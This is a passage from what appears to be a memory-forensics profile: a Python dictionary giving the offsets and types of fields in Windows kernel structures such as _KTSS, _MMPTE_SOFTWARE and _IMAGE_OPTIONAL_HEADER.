'NewIrql' : [ 0x5, ['unsigned char']],
'Processor' : [ 0x6, ['unsigned short']],
'TickCount' : [ 0x8, ['unsigned long']],
'StackTrace' : [ 0xc, ['array', 5, ['pointer', ['void']]]],
} ],
'_PNP_DEVICE_EVENT_ENTRY' : [ 0x64, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Argument' : [ 0x8, ['unsigned long']],
'CallerEvent' : [ 0xc, ['pointer', ['_KEVENT']]],
'Callback' : [ 0x10, ['pointer', ['void']]],
'Context' : [ 0x14, ['pointer', ['void']]],
'VetoType' : [ 0x18, ['pointer', ['Enumeration', dict(target = 'long', choices = {0: 'PNP_VetoTypeUnknown', 1: 'PNP_VetoLegacyDevice', 2: 'PNP_VetoPendingClose', 3: 'PNP_VetoWindowsApp', 4: 'PNP_VetoWindowsService', 5: 'PNP_VetoOutstandingOpen', 6: 'PNP_VetoDevice', 7: 'PNP_VetoDriver', 8: 'PNP_VetoIllegalDeviceRequest', 9: 'PNP_VetoInsufficientPower', 10: 'PNP_VetoNonDisableable', 11: 'PNP_VetoLegacyDriver', 12: 'PNP_VetoInsufficientRights'})]]],
'VetoName' : [ 0x1c, ['pointer', ['_UNICODE_STRING']]],
'Data' : [ 0x20, ['_PLUGPLAY_EVENT_BLOCK']],
} ],
'_HEAP_STOP_ON_TAG' : [ 0x4, {
'HeapAndTagIndex' : [ 0x0, ['unsigned long']],
'TagIndex' : [ 0x0, ['unsigned short']],
'HeapIndex' : [ 0x2, ['unsigned short']],
} ],
'_DBGKD_GET_CONTEXT' : [ 0x4, {
'Unused' : [ 0x0, ['unsigned long']],
} ],
'_TEB_ACTIVE_FRAME_CONTEXT' : [ 0x8, {
'Flags' : [ 0x0, ['unsigned long']],
'FrameName' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_NLS_DATA_BLOCK' : [ 0xc, {
'AnsiCodePageData' : [ 0x0, ['pointer', ['void']]],
'OemCodePageData' : [ 0x4, ['pointer', ['void']]],
'UnicodeCaseTableData' : [ 0x8, ['pointer', ['void']]],
} ],
'_ALIGNED_AFFINITY_SUMMARY' : [ 0x40, {
'CpuSet' : [ 0x0, ['_KAFFINITY_EX']],
'SMTSet' : [ 0xc, ['_KAFFINITY_EX']],
} ],
'_XSTATE_CONFIGURATION' : [ 0x210, {
'EnabledFeatures' : [ 0x0, ['unsigned long long']],
'Size' : [ 0x8, ['unsigned long']],
'OptimizedSave' : [ 0xc, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Features' : [ 0x10, ['array', 64, ['_XSTATE_FEATURE']]],
} ],
'_CM_KEY_SECURITY_CACHE' : [ 0x2c, {
'Cell' : [ 0x0, ['unsigned long']],
'ConvKey' : [ 0x4, ['unsigned long']],
'List' : [ 0x8, ['_LIST_ENTRY']],
'DescriptorLength' : [ 0x10, ['unsigned long']],
'RealRefCount' : [ 0x14, ['unsigned long']],
'Descriptor' : [ 0x18, ['_SECURITY_DESCRIPTOR_RELATIVE']],
} ],
'_MMPTE_SOFTWARE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PageFileLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFileHigh' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_NT_TIB32' : [ 0x1c, {
'ExceptionList' : [ 0x0, ['unsigned long']],
'StackBase' : [ 0x4, ['unsigned long']],
'StackLimit' : [ 0x8, ['unsigned long']],
'SubSystemTib' : [ 0xc, ['unsigned long']],
'FiberData' : [ 0x10, ['unsigned long']],
'Version' : [ 0x10, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x14, ['unsigned long']],
'Self' : [ 0x18, ['unsigned long']],
} ],
'_CM_RESOURCE_LIST' : [ 0x24, {
'Count' : [ 0x0, ['unsigned long']],
'List' : [ 0x4, ['array', 1, ['_CM_FULL_RESOURCE_DESCRIPTOR']]],
} ],
'_POOL_TRACKER_TABLE' : [ 0x1c, {
'Key' : [ 0x0, ['long']],
'NonPagedAllocs' : [ 0x4, ['long']],
'NonPagedFrees' : [ 0x8, ['long']],
'NonPagedBytes' : [ 0xc, ['unsigned long']],
'PagedAllocs' : [ 0x10, ['unsigned long']],
'PagedFrees' : [ 0x14, ['unsigned long']],
'PagedBytes' : [ 0x18, ['unsigned long']],
} ],
'_MM_SUBSECTION_AVL_TABLE' : [ 0x20, {
'BalancedRoot' : [ 0x0, ['_MMSUBSECTION_NODE']],
'DepthOfTree' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 5, native_type='unsigned long')]],
'Unused' : [ 0x18, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned long')]],
'NumberGenericTableElements' : [ 0x18, ['BitField', dict(start_bit = 8, end_bit = 32, native_type='unsigned long')]],
'NodeHint' : [ 0x1c, ['pointer', ['void']]],
} ],
'_HANDLE_TABLE_ENTRY_INFO' : [ 0x4, {
'AuditMask' : [ 0x0, ['unsigned long']],
} ],
'_CM_FULL_RESOURCE_DESCRIPTOR' : [ 0x20, {
'InterfaceType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0x4, ['unsigned long']],
'PartialResourceList' : [ 0x8, ['_CM_PARTIAL_RESOURCE_LIST']],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS' : [ 0x4, {
'Primary' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ContainmentWarning' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Reset' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ThresholdExceeded' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ResourceNotAvailable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'LatentError' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_WMI_BUFFER_HEADER' : [ 0x48, {
'BufferSize' : [ 0x0, ['unsigned long']],
'SavedOffset' : [ 0x4, ['unsigned long']],
'CurrentOffset' : [ 0x8, ['unsigned long']],
'ReferenceCount' : [ 0xc, ['long']],
'TimeStamp' : [ 0x10, ['_LARGE_INTEGER']],
'SequenceNumber' : [ 0x18, ['long long']],
'Padding0' : [ 0x20, ['array', 2, ['unsigned long']]],
'SlistEntry' : [ 0x20, ['_SINGLE_LIST_ENTRY']],
'NextBuffer' : [ 0x20, ['pointer', ['_WMI_BUFFER_HEADER']]],
'ClientContext' : [ 0x28, ['_ETW_BUFFER_CONTEXT']],
'State' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'EtwBufferStateFree', 1: 'EtwBufferStateGeneralLogging', 2: 'EtwBufferStateCSwitch', 3: 'EtwBufferStateFlush', 4: 'EtwBufferStateMaximum'})]],
'Offset' : [ 0x30, ['unsigned long']],
'BufferFlag' : [ 0x34, ['unsigned short']],
'BufferType' : [ 0x36, ['unsigned short']],
'Padding1' : [ 0x38, ['array', 4, ['unsigned long']]],
'ReferenceTime' : [ 0x38, ['_ETW_REF_CLOCK']],
'GlobalEntry' : [ 0x38, ['_LIST_ENTRY']],
'Pointer0' : [ 0x38, ['pointer', ['void']]],
'Pointer1' : [ 0x3c, ['pointer', ['void']]],
} ],
'_NT_TIB64' : [ 0x38, {
'ExceptionList' : [ 0x0, ['unsigned long long']],
'StackBase' : [ 0x8, ['unsigned long long']],
'StackLimit' : [ 0x10, ['unsigned long long']],
'SubSystemTib' : [ 0x18, ['unsigned long long']],
'FiberData' : [ 0x20, ['unsigned long long']],
'Version' : [ 0x20, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x28, ['unsigned long long']],
'Self' : [ 0x30, ['unsigned long long']],
} ],
'_POWER_SEQUENCE' : [ 0xc, {
'SequenceD1' : [ 0x0, ['unsigned long']],
'SequenceD2' : [ 0x4, ['unsigned long']],
'SequenceD3' : [ 0x8, ['unsigned long']],
} ],
'_PROCESSOR_POWER_STATE' : [ 0xc8, {
'IdleStates' : [ 0x0, ['pointer', ['_PPM_IDLE_STATES']]],
'IdleTimeLast' : [ 0x8, ['unsigned long long']],
'IdleTimeTotal' : [ 0x10, ['unsigned long long']],
'IdleTimeEntry' : [ 0x18, ['unsigned long long']],
'IdleAccounting' : [ 0x20, ['pointer', ['_PROC_IDLE_ACCOUNTING']]],
'Hypervisor' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'ProcHypervisorNone', 1: 'ProcHypervisorPresent', 2: 'ProcHypervisorPower'})]],
'PerfHistoryTotal' : [ 0x28, ['unsigned long']],
'ThermalConstraint' : [ 0x2c, ['unsigned char']],
'PerfHistoryCount' : [ 0x2d, ['unsigned char']],
'PerfHistorySlot' : [ 0x2e, ['unsigned char']],
'Reserved' : [ 0x2f, ['unsigned char']],
'LastSysTime' : [ 0x30, ['unsigned long']],
'WmiDispatchPtr' : [ 0x34, ['unsigned long']],
'WmiInterfaceEnabled' : [ 0x38, ['long']],
'FFHThrottleStateInfo' : [ 0x40, ['_PPM_FFH_THROTTLE_STATE_INFO']],
'PerfActionDpc' : [ 0x60, ['_KDPC']],
'PerfActionMask' : [ 0x80, ['long']],
'IdleCheck' : [ 0x88, ['_PROC_IDLE_SNAP']],
'PerfCheck' : [ 0x98, ['_PROC_IDLE_SNAP']],
'Domain' : [ 0xa8, ['pointer', ['_PROC_PERF_DOMAIN']]],
'PerfConstraint' : [ 0xac, ['pointer', ['_PROC_PERF_CONSTRAINT']]],
'Load' : [ 0xb0, ['pointer', ['_PROC_PERF_LOAD']]],
'PerfHistory' : [ 0xb4, ['pointer', ['_PROC_HISTORY_ENTRY']]],
'Utility' : [ 0xb8, ['unsigned long']],
'OverUtilizedHistory' : [ 0xbc, ['unsigned long']],
'AffinityCount' : [ 0xc0, ['unsigned long']],
'AffinityHistory' : [ 0xc4, ['unsigned long']],
} ],
'_OBJECT_REF_STACK_INFO' : [ 0xc, {
'Sequence' : [ 0x0, ['unsigned long']],
'Index' : [ 0x4, ['unsigned short']],
'NumTraces' : [ 0x6, ['unsigned short']],
'Tag' : [ 0x8, ['unsigned long']],
} ],
'_PPC_DBGKD_CONTROL_SET' : [ 0xc, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long']],
'CurrentSymbolEnd' : [ 0x8, ['unsigned long']],
} ],
'_MMPFNENTRY' : [ 0x2, {
'PageLocation' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'WriteInProgress' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Modified' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'ReadInProgress' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'CacheAttribute' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 8, native_type='unsigned char')]],
'Priority' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'Rom' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'InPageError' : [ 0x1, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'KernelStack' : [ 0x1, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'RemovalRequested' : [ 0x1, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'ParityError' : [ 0x1, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
} ],
'_SEGMENT_OBJECT' : [ 0x28, {
'BaseAddress' : [ 0x0, ['pointer', ['void']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SizeOfSegment' : [ 0x8, ['_LARGE_INTEGER']],
'NonExtendedPtes' : [ 0x10, ['unsigned long']],
'ImageCommitment' : [ 0x14, ['unsigned long']],
'ControlArea' : [ 0x18, ['pointer', ['_CONTROL_AREA']]],
'Subsection' : [ 0x1c, ['pointer', ['_SUBSECTION']]],
'MmSectionFlags' : [ 0x20, ['pointer', ['_MMSECTION_FLAGS']]],
'MmSubSectionFlags' : [ 0x24, ['pointer', ['_MMSUBSECTION_FLAGS']]],
} ],
'_PCW_CALLBACK_INFORMATION' : [ 0x20, {
'AddCounter' : [ 0x0, ['_PCW_COUNTER_INFORMATION']],
'RemoveCounter' : [ 0x0, ['_PCW_COUNTER_INFORMATION']],
'EnumerateInstances' : [ 0x0, ['_PCW_MASK_INFORMATION']],
'CollectData' : [ 0x0, ['_PCW_MASK_INFORMATION']],
} ],
'_KTSS' : [ 0x20ac, {
'Backlink' : [ 0x0, ['unsigned short']],
'Reserved0' : [ 0x2, ['unsigned short']],
'Esp0' : [ 0x4, ['unsigned long']],
'Ss0' : [ 0x8, ['unsigned short']],
'Reserved1' : [ 0xa, ['unsigned short']],
'NotUsed1' : [ 0xc, ['array', 4, ['unsigned long']]],
'CR3' : [ 0x1c, ['unsigned long']],
'Eip' : [ 0x20, ['unsigned long']],
'EFlags' : [ 0x24, ['unsigned long']],
'Eax' : [ 0x28, ['unsigned long']],
'Ecx' : [ 0x2c, ['unsigned long']],
'Edx' : [ 0x30, ['unsigned long']],
'Ebx' : [ 0x34, ['unsigned long']],
'Esp' : [ 0x38, ['unsigned long']],
'Ebp' : [ 0x3c, ['unsigned long']],
'Esi' : [ 0x40, ['unsigned long']],
'Edi' : [ 0x44, ['unsigned long']],
'Es' : [ 0x48, ['unsigned short']],
'Reserved2' : [ 0x4a, ['unsigned short']],
'Cs' : [ 0x4c, ['unsigned short']],
'Reserved3' : [ 0x4e, ['unsigned short']],
'Ss' : [ 0x50, ['unsigned short']],
'Reserved4' : [ 0x52, ['unsigned short']],
'Ds' : [ 0x54, ['unsigned short']],
'Reserved5' : [ 0x56, ['unsigned short']],
'Fs' : [ 0x58, ['unsigned short']],
'Reserved6' : [ 0x5a, ['unsigned short']],
'Gs' : [ 0x5c, ['unsigned short']],
'Reserved7' : [ 0x5e, ['unsigned short']],
'LDT' : [ 0x60, ['unsigned short']],
'Reserved8' : [ 0x62, ['unsigned short']],
'Flags' : [ 0x64, ['unsigned short']],
'IoMapBase' : [ 0x66, ['unsigned short']],
'IoMaps' : [ 0x68, ['array', 1, ['_KiIoAccessMap']]],
'IntDirectionMap' : [ 0x208c, ['array', 32, ['unsigned char']]],
} ],
'_TOKEN_SOURCE' : [ 0x10, {
'SourceName' : [ 0x0, ['array', 8, ['unsigned char']]],
'SourceIdentifier' : [ 0x8, ['_LUID']],
} ],
'_DBGKD_QUERY_MEMORY' : [ 0x18, {
'Address' : [ 0x0, ['unsigned long long']],
'Reserved' : [ 0x8, ['unsigned long long']],
'AddressSpace' : [ 0x10, ['unsigned long']],
'Flags' : [ 0x14, ['unsigned long']],
} ],
'_KIDTENTRY' : [ 0x8, {
'Offset' : [ 0x0, ['unsigned short']],
'Selector' : [ 0x2, ['unsigned short']],
'Access' : [ 0x4, ['unsigned short']],
'ExtendedOffset' : [ 0x6, ['unsigned short']],
} ],
'DOCK_INTERFACE' : [ 0x18, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
'ProfileDepartureSetMode' : [ 0x10, ['pointer', ['void']]],
'ProfileDepartureUpdate' : [ 0x14, ['pointer', ['void']]],
} ],
'CMP_OFFSET_ARRAY' : [ 0xc, {
'FileOffset' : [ 0x0, ['unsigned long']],
'DataBuffer' : [ 0x4, ['pointer', ['void']]],
'DataLength' : [ 0x8, ['unsigned long']],
} ],
'_MMSUPPORT_FLAGS' : [ 0x4, {
'WorkingSetType' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'ModwriterAttached' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'TrimHard' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'MaximumWorkingSetHard' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'ForceTrim' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'MinimumWorkingSetHard' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'SessionMaster' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'TrimmerState' : [ 0x1, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned char')]],
'Reserved' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'PageStealers' : [ 0x1, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'MemoryPriority' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'WsleDeleted' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'VmExiting' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'ExpansionFailed' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Available' : [ 0x3, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
} ],
'_IMAGE_OPTIONAL_HEADER' : [ 0xe0, {
'Magic' : [ 0x0, ['unsigned short']],
'MajorLinkerVersion' : [ 0x2, ['unsigned char']],
'MinorLinkerVersion' : [ 0x3, ['unsigned char']],
'SizeOfCode' : [ 0x4, ['unsigned long']],
'SizeOfInitializedData' : [ 0x8, ['unsigned long']],
'SizeOfUninitializedData' : [ 0xc, ['unsigned long']],
'AddressOfEntryPoint' : [ 0x10, ['unsigned long']],
'BaseOfCode' : [ 0x14, ['unsigned long']],
'BaseOfData' : [ 0x18, ['unsigned long']],
'ImageBase' : [ 0x1c, ['unsigned long']],
'SectionAlignment' : [ 0x20, ['unsigned long']],
'FileAlignment' : [ 0x24, ['unsigned long']],
'MajorOperatingSystemVersion' : [ 0x28, ['unsigned short']],
'MinorOperatingSystemVersion' : [ 0x2a, ['unsigned short']],
'MajorImageVersion' : [ 0x2c, ['unsigned short']],
'MinorImageVersion' : [ 0x2e, ['unsigned short']],
'MajorSubsystemVersion' : [ 0x30, ['unsigned short']],
'MinorSubsystemVersion' : [ 0x32, ['unsigned short']],
'Win32VersionValue' : [ 0x34, ['unsigned long']],
'SizeOfImage' : [ 0x38, ['unsigned long']],
'SizeOfHeaders' : [ 0x3c, ['unsigned long']],
'CheckSum' : [ 0x40, ['unsigned long']],
'Subsystem' : [ 0x44, ['unsigned short']],
'DllCharacteristics' : [ 0x46, ['unsigned short']],
'SizeOfStackReserve' : [ 0x48, ['unsigned long']],
'SizeOfStackCommit' : [ 0x4c, ['unsigned long']],
'SizeOfHeapReserve' : [ 0x50, ['unsigned long']],
'SizeOfHeapCommit' : [ 0x54, ['unsigned long']],
'LoaderFlags' : [ 0x58, ['unsigned long']],
'NumberOfRvaAndSizes' : [ 0x5c, ['unsigned long']],
'DataDirectory' : [ 0x60, ['array', 16, ['_IMAGE_DATA_DIRECTORY']]],
} ],
'_ALPC_COMPLETION_PACKET_LOOKASIDE' : [ 0x30, {
'Lock' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
'ActiveCount' : [ 0x8, ['unsigned long']],
'PendingNullCount' : [ 0xc, ['unsigned long']],
'PendingCheckCompletionListCount' : [ 0x10, ['unsigned long']],
'PendingDelete' : [ 0x14, ['unsigned long']],
'FreeListHead' : [ 0x18, ['_SINGLE_LIST_ENTRY']],
'CompletionPort' : [ 0x1c, ['pointer', ['void']]],
'CompletionKey' : [ 0x20, ['pointer', ['void']]],
'Entry' : [ 0x24, ['array', 1, ['_ALPC_COMPLETION_PACKET_LOOKASIDE_ENTRY']]],
} ],
'_TERMINATION_PORT' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_TERMINATION_PORT']]],
'Port' : [ 0x4, ['pointer', ['void']]],
} ],
'_MEMORY_ALLOCATION_DESCRIPTOR' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'MemoryType' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'LoaderExceptionBlock', 1: 'LoaderSystemBlock', 2: 'LoaderFree', 3: 'LoaderBad', 4: 'LoaderLoadedProgram', 5: 'LoaderFirmwareTemporary', 6: 'LoaderFirmwarePermanent', 7: 'LoaderOsloaderHeap', 8: 'LoaderOsloaderStack', 9: 'LoaderSystemCode', 10: 'LoaderHalCode', 11: 'LoaderBootDriver', 12: 'LoaderConsoleInDriver', 13: 'LoaderConsoleOutDriver', 14: 'LoaderStartupDpcStack', 15: 'LoaderStartupKernelStack', 16: 'LoaderStartupPanicStack', 17: 'LoaderStartupPcrPage', 18: 'LoaderStartupPdrPage', 19: 'LoaderRegistryData', 20: 'LoaderMemoryData', 21: 'LoaderNlsData', 22: 'LoaderSpecialMemory', 23: 'LoaderBBTMemory', 24: 'LoaderReserve', 25: 'LoaderXIPRom', 26: 'LoaderHALCachedMemory', 27: 'LoaderLargePageFiller', 28: 'LoaderErrorLogMemory', 29: 'LoaderMaximum'})]],
'BasePage' : [ 0xc, ['unsigned long']],
'PageCount' : [ 0x10, ['unsigned long']],
} ],
'_CM_INTENT_LOCK' : [ 0x8, {
'OwnerCount' : [ 0x0, ['unsigned long']],
'OwnerTable' : [ 0x4, ['pointer', ['pointer', ['_CM_KCB_UOW']]]],
} ],
'_PROC_IDLE_ACCOUNTING' : [ 0x2c0, {
'StateCount' : [ 0x0, ['unsigned long']],
'TotalTransitions' : [ 0x4, ['unsigned long']],
'ResetCount' : [ 0x8, ['unsigned long']],
'StartTime' : [ 0x10, ['unsigned long long']],
'BucketLimits' : [ 0x18, ['array', 16, ['unsigned long long']]],
'State' : [ 0x98, ['array', 1, ['_PROC_IDLE_STATE_ACCOUNTING']]],
} ],
'_THERMAL_INFORMATION' : [ 0x4c, {
'ThermalStamp' : [ 0x0, ['unsigned long']],
'ThermalConstant1' : [ 0x4, ['unsigned long']],
'ThermalConstant2' : [ 0x8, ['unsigned long']],
'Processors' : [ 0xc, ['unsigned long']],
'SamplingPeriod' : [ 0x10, ['unsigned long']],
'CurrentTemperature' : [ 0x14, ['unsigned long']],
'PassiveTripPoint' : [ 0x18, ['unsigned long']],
'CriticalTripPoint' : [ 0x1c, ['unsigned long']],
'ActiveTripPointCount' : [ 0x20, ['unsigned char']],
'ActiveTripPoint' : [ 0x24, ['array', 10, ['unsigned long']]],
} ],
'_MAPPED_FILE_SEGMENT' : [ 0x20, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SegmentFlags' : [ 0x8, ['_SEGMENT_FLAGS']],
'NumberOfCommittedPages' : [ 0xc, ['unsigned long']],
'SizeOfSegment' : [ 0x10, ['unsigned long long']],
'ExtendInfo' : [ 0x18, ['pointer', ['_MMEXTEND_INFO']]],
'BasedAddress' : [ 0x18, ['pointer', ['void']]],
'SegmentLock' : [ 0x1c, ['_EX_PUSH_LOCK']],
} ],
'_GDI_TEB_BATCH' : [ 0x4e0, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x4, ['unsigned long']],
'Buffer' : [ 0x8, ['array', 310, ['unsigned long']]],
} ],
'_MM_DRIVER_VERIFIER_DATA' : [ 0x84, {
'Level' : [ 0x0, ['unsigned long']],
'RaiseIrqls' : [ 0x4, ['unsigned long']],
'AcquireSpinLocks' : [ 0x8, ['unsigned long']],
'SynchronizeExecutions' : [ 0xc, ['unsigned long']],
'AllocationsAttempted' : [ 0x10, ['unsigned long']],
'AllocationsSucceeded' : [ 0x14, ['unsigned long']],
'AllocationsSucceededSpecialPool' : [ 0x18, ['unsigned long']],
'AllocationsWithNoTag' : [ 0x1c, ['unsigned long']],
'TrimRequests' : [ 0x20, ['unsigned long']],
'Trims' : [ 0x24, ['unsigned long']],
'AllocationsFailed' : [ 0x28, ['unsigned long']],
'AllocationsFailedDeliberately' : [ 0x2c, ['unsigned long']],
'Loads' : [ 0x30, ['unsigned long']],
'Unloads' : [ 0x34, ['unsigned long']],
'UnTrackedPool' : [ 0x38, ['unsigned long']],
'UserTrims' : [ 0x3c, ['unsigned long']],
'CurrentPagedPoolAllocations' : [ 0x40, ['unsigned long']],
'CurrentNonPagedPoolAllocations' : [ 0x44, ['unsigned long']],
'PeakPagedPoolAllocations' : [ 0x48, ['unsigned long']],
'PeakNonPagedPoolAllocations' : [ 0x4c, ['unsigned long']],
'PagedBytes' : [ 0x50, ['unsigned long']],
'NonPagedBytes' : [ 0x54, ['unsigned long']],
'PeakPagedBytes' : [ 0x58, ['unsigned long']],
'PeakNonPagedBytes' : [ 0x5c, ['unsigned long']],
'BurstAllocationsFailedDeliberately' : [ 0x60, ['unsigned long']],
'SessionTrims' : [ 0x64, ['unsigned long']],
'OptionChanges' : [ 0x68, ['unsigned long']],
'VerifyMode' : [ 0x6c, ['unsigned long']],
'PreviousBucketName' : [ 0x70, ['_UNICODE_STRING']],
'ActivityCounter' : [ 0x78, ['unsigned long']],
'PreviousActivityCounter' : [ 0x7c, ['unsigned long']],
'WorkerTrimRequests' : [ 0x80, ['unsigned long']],
} ],
'_VI_FAULT_TRACE' : [ 0x24, {
'Thread' : [ 0x0, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0x4, ['array', 8, ['pointer', ['void']]]],
} ],
'_GENERIC_MAPPING' : [ 0x10, {
'GenericRead' : [ 0x0, ['unsigned long']],
'GenericWrite' : [ 0x4, ['unsigned long']],
'GenericExecute' : [ 0x8, ['unsigned long']],
'GenericAll' : [ 0xc, ['unsigned long']],
} ],
'_OBJECT_HANDLE_COUNT_DATABASE' : [ 0xc, {
'CountEntries' : [ 0x0, ['unsigned long']],
'HandleCountEntries' : [ 0x4, ['array', 1, ['_OBJECT_HANDLE_COUNT_ENTRY']]],
} ],
'_OWNER_ENTRY' : [ 0x8, {
'OwnerThread' : [ 0x0, ['unsigned long']],
'IoPriorityBoosted' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OwnerReferenced' : [ 0x4, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'OwnerCount' : [ 0x4, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
'TableSize' : [ 0x4, ['unsigned long']],
} ],
'_MI_SECTION_CREATION_GATE' : [ 0x14, {
'Next' : [ 0x0, ['pointer', ['_MI_SECTION_CREATION_GATE']]],
'Gate' : [ 0x4, ['_KGATE']],
} ],
'_ETIMER' : [ 0x98, {
'KeTimer' : [ 0x0, ['_KTIMER']],
'TimerApc' : [ 0x28, ['_KAPC']],
'TimerDpc' : [ 0x58, ['_KDPC']],
'ActiveTimerListEntry' : [ 0x78, ['_LIST_ENTRY']],
'Lock' : [ 0x80, ['unsigned long']],
'Period' : [ 0x84, ['long']],
'ApcAssociated' : [ 0x88, ['unsigned char']],
'WakeReason' : [ 0x8c, ['pointer', ['_DIAGNOSTIC_CONTEXT']]],
'WakeTimerListEntry' : [ 0x90, ['_LIST_ENTRY']],
} ],
'_FREE_DISPLAY' : [ 0xc, {
'RealVectorSize' : [ 0x0, ['unsigned long']],
'Display' : [ 0x4, ['_RTL_BITMAP']],
} ],
'_POOL_BLOCK_HEAD' : [ 0x10, {
'Header' : [ 0x0, ['_POOL_HEADER']],
'List' : [ 0x8, ['_LIST_ENTRY']],
} ],
'__unnamed_1dc5' : [ 0x4, {
'Flags' : [ 0x0, ['_MMSECURE_FLAGS']],
'StartVa' : [ 0x0, ['pointer', ['void']]],
} ],
'_MMADDRESS_LIST' : [ 0x8, {
'u1' : [ 0x0, ['__unnamed_1dc5']],
'EndVa' : [ 0x4, ['pointer', ['void']]],
} ],
'_XSTATE_FEATURE' : [ 0x8, {
'Offset' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_ARBITER_INSTANCE' : [ 0x5ec, {
'Signature' : [ 0x0, ['unsigned long']],
'MutexEvent' : [ 0x4, ['pointer', ['_KEVENT']]],
'Name' : [ 0x8, ['pointer', ['unsigned short']]],
'OrderingName' : [ 0xc, ['pointer', ['unsigned short']]],
'ResourceType' : [ 0x10, ['long']],
